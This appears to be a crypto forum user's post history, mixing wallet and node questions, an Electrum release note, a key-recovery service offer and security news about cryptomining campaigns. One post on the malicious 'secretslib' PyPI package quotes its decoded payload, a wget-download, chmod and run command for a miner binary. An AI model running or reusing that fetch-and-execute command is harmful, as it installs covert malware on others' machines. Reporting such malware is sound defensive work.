 Show Posts
|
|
Pages: « 1 [2] 3 4 5 »
|
|
Macie jakieś opinie na temat ALGO? A może więcej niż opinie, wskazówki, porady, ostrzeżenia?
Temat jest interesujący, wpadł mi w oko i myśle czy nie przyjąć pozycji (long rzecz jasna). Oficjalne papiery trzeba pewnie brać jak zwykle z przymrużeniem oka i dzielić na 2, ale kto wie co z tego wyjdzie. A sezon na alty może znów nadejdzie.
|
|
|
|
Some of you may be aware of "continues integration" approach in software development. One of tool used for that could be - for example - GitHub Actions. Server takes software code and launches build, tests etc, to see if new development did not break anything. That's theory. What if someone would add "one more extra task" to be performed on the server side? The Sysdig Threat Research Team (Sysdig TRT) recently uncovered an extensive and sophisticated active cryptomining operation and called that PURPLEURCHIN - more details there: https://sysdig.com/blog/massive-cryptomining-operation-github-actions/ |
|
|
|
Recently I have found an information about problems with fiber cable which was damaged (probably intentionally) and causes some networking issues: https://trust.zscaler.com/zscloud.net/posts/12256It made me think - is it possible that bitcoin nodes network would be split? I know that many connects to many etc, but what if "2 bubbles", similar size, enough to be fully functional, would be created? Imagine that for example South&North Americas lost connection to rest of network (no oceanic cables, no satelites etc etc). Is it possible to detect that you are in a separated bubble? I assume we would have 2 chains, which would make it impossible to merge. From the point of single node it would only mean that you lost some connections but you are able to quickly find replacements. At the end now, when you have your node and you are connected to 10 other nodes, you do not know if you are connected to Asia and Australia or to your neighbors on the next street - there is no criteria for nodes selection, is there? |
|
|
|
I offer my service and help in WIF & seed recovery. Depending on the case, I offer support and explanation of potential solution (and chances) to recovery partially lost WIF using one of my programs: - WifSolver - for CPU, for simple cases when only a few characters are missing or if they are missing in several places in WIF - WifSolverCuda - for GPU, for cases when there is a large gap at the beginning or in the middle of WIF, when public key is unknown - Kangaroo - for CPU/GPU, my version is a JLP's program patched to support solving WIFs when public key is known As any clues could be helpful, I also work with partially lost QR codes from paper wallets. Additionally, for recovering missing words from a seed I offer using: - LostWord - for CPU, for cases when there are some clues what the possible words are and/or only 2-3 words are completely missing - LostWordCuda - (in development phase) for recovering seed using GPU I also offer recovering access to brainwallets knowing a partial hints. Of course, if it is suitable, other public tools could be used (BitCrack, btcrecover etc.). If it is needed, I offer writing a program dedicated to a given problem. |
|
|
|
Anyone using VMware Workspace ONE Access? Check if you use a patched version (CVE-2022-22954). Otherwise, maybe you mine Monero for someone. Researchers at cybersecurity company Fortinet noticed in the newest campaigns that the threat actors deployed the Mira botnet for distributed denial-of-service (DDoS) attacks, the GuardMiner cryptocurrency miner, and the RAR1Ransom tool. One interesting case is a pair of Bash and PowerShell scripts targeting Linux and Windows systems. The scripts fetch a list of files to launch on the compromised machine. The PowerShell script ("init.ps1") downloads the following files from a Cloudflare IPFS gateway: phpupdate.exe: Xmrig Monero mining software config.json: Configuration file for mining pools networkmanager.exe: Executable used to scan and spread infection phpguard.exe: Executable used for guardian Xmrig miner to keep running clean.bat: Script file to remove other cryptominers on the compromised host More details: https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-flaw-to-drop-ransomware-miners/ |
|
|
|
A recent study by iVox commissioned by Partena Professional shows that 22% of the employees surveyed are open to the idea of receiving part of their wages in cryptocurrency. Within that group, especially men (30% of the total number of men surveyed) are willing to be paid partly in cryptocurrency. In the category of employees under the age of 35, 35.9% are in favor of this idea. This age group is most positive about a salary in cryptocurrency. Currently it is not allowed, as cryptocurrency is not recognized as a legal tender. The same rules is for base salary and for bonuses - even with agreement between employer and the employee. More details: https://hrmagazine.be/nl/posts/een-op-vier-bereid-om-stuk-loon-te-krijgen-in-cryptogeld |
|
|
|
Celsius, a cryptocurrency exchange facing bankruptcy, leaked an enormous collection of its users' transaction data through an unusual sort of privacy breach: a court filing. As part of its bankruptcy proceedings—in which the company's owners are accused of pulling tens of millions of dollars worth of crypto out of the exchange before revealing its insolvency— the company's attorneys released a document that appears to include the transaction data of half a million of its users from April of this year until it ceased trading in June. That database was briefly posted as a 14,500-page PDF to the court records website PACER before being taken down—but not before Gizmodo copied it to the Internet Archive, where it was widely downloaded before being removed there, too. Incredible "legal" leak. More details: https://www.wired.com/story/celsius-user-data-dump-crypto-tracing-scammers/ |
|
|
|
|
Hello
I have tried to execute transaction using Electrum wallet connected with Trezor, all was as usuall, but when Trezor displayed amount for confirmation, there was something strange - instead of usuall "Amount X including fee Y", it was "Amount Y including fee Y" (bot amount were fee amounts). In Electrum transaction was looking good. The same Trezor connected to Trezor Suite displayed correct amounts.
I did not confirm transaction so I do not know what whould be the final output, but for sure, what I seen on Trezor screen was wrong.
Anyone had the same issue? Matter of Electrum or Trezor firmware?
|
|
|
|
Hello I have played a little with LN included in btcpayserver. I have opened the channel with coingate, transferred some sats. Channel was opened (transaction confirmed etc.), but now it is closed and I cannot reconnect to peer. 3.124.63.44:9735: Exchanging Init Messages: Peer Closed Connection. What should I do? |
|
|
|
|
Hello
Who is responsible for the list of known servers? How is it organized, is a new server automatically added in or must it be registered somewhere?
In other words, if I run my server, should I report it to be added to the list? Should I do something to be sure it will not be added?
|
|
|
|
Webhards are the main platforms that the attackers targeting Korean users exploit to distribute malware. What was recently found was XMRig, famous Monero Miner. Anyway - if you do not download software from the official site, but from random sources, do not be surprised you get promo "2 in 1". More info: https://asec.ahnlab.com/en/37526/ |
|
|
|
New electrum version is released. It contains some minor fixes for Lightning network and UI # Release 4.3.1 - (August 17, 2022)
* build: we now also distribute a "source-only"
Linux-packager-friendly tarball (d0de44a7, #7594), in addition
to the current "normal" tarball. The "source-only" tarball excludes
compiled locale files, generated protobuf files, and does not
vendor our runtime python dependencies (the packages/ folder).
* fix os.chmod when running in tmpfs on Linux (#7681)
* (Qt GUI) some improvements for high-DPI monitors (38881129)
* bring kivy request dialog more in-line with Qt (#7929)
* rm support of "legacy" (without static_remotekey) LN channels.
Opening these channels were never supported in a release version,
only during development prior to the first lightning-capable
release. Wallets with such channels will have to close them.
(1f403d1c, 7b8e257e)
* Qt: fix duplication of some OS notifications on onchain txs (#7943)
* fix multiple recent regressions:
- handle NotEnoughFunds when trying to pay LN invoice (#7920)
- handle NotEnoughFunds when trying to open LN channel (#7921)
- labels of payment requests were not propagated to
history/addresses (#7919)
- better default labels of outgoing txs (#7942)
- kivy: dust-valued requests could not be created for LN (#7928)
- when closing LN channels, future (timelocked) txs were not
shown in history (#7930)
- kivy: fix deleting "local" tx from history (#7933)
- kivy: fix paying amountless LN invoice (#7935)
- Qt: better handle unparseable URIs (#7941) |
|
|
|
'secretslib' PyPI package covertly runs cryptominers on Linux machine in-memory (directly from your RAM). The package, at the time of its release, claimed to be a library that "helps with matching and verification of secrets". The main 'setup.py' script inside the package contains straightforward base64-encoded instructions: sudo apt -y install wget cpulimit > /dev/null 2>&1 && wget -q http://5.161.57[.]250/tox && chmod +x ./tox && timeout -k 5s 1h
sudo ./tox
rm ./tox The stipped 'tox' binary has a clean reputation on VirusTotal [archived], as it achieves 'zero detection' across virtually every antivirus engine. The malicious code dropped by 'tox' (referred to as 'memfd' by VirusTotal) is a Monero cryptominer. 'secretslib' package deletes 'tox' as soon as it runs, and the cryptomining code injected by 'tox' resides within the system's volatile memory (RAM) as opposed to the hard drive, the malicious activity leaves little to no footprint and is quite "invisible" in a forensic sense. More details: https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero |
|
|
|
Hello Having a free afternoon I have prepared a very simple mempool watcher, which uses RPC connection to (local) node, checks transactions and if there is any transaction with output to known address, it prepares a transaction which moves amount to destination address. The idea was to have some "automatic" transfers when there is payment to given address(es). For example you have tool which generates addresses from seed (for your clients) and after payment you move funds to one single address. Currently it is really very simple app, maybe I will extend it in the future - for example retrieve private keys from seed (now it expects list of WIFs). It connects to node using provided path ( http://user:pass@host:port/) or path to .cookie file (then connects to 127.0.0.1:8332). If there is any interest in that kind of projects, I will add new features, for now it is as it is. It was more like an exercise for me, as I did not work with RPC /remote connection/ never before. Sources and the first release: https://github.com/PawelGorny/NodeWatcher |
|
|
|
8220 Mining Group, was first publicly reported in 2018. The name 8220 Gang comes from the group’s original use of port 8220 for C2 network communications. Over the last month a crimeware has expanded their botnet to roughly 30,000 hosts globally through the use of Linux and common cloud application vulnerabilities and poorly secured configurations. In a recent campaign, the group was observed making use of a new version of the IRC botnet, PwnRig cryptocurrency miner (a custom version of the open source XMRig miner), and its generic infection script. Some more data: https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/ |
|
|
|
|
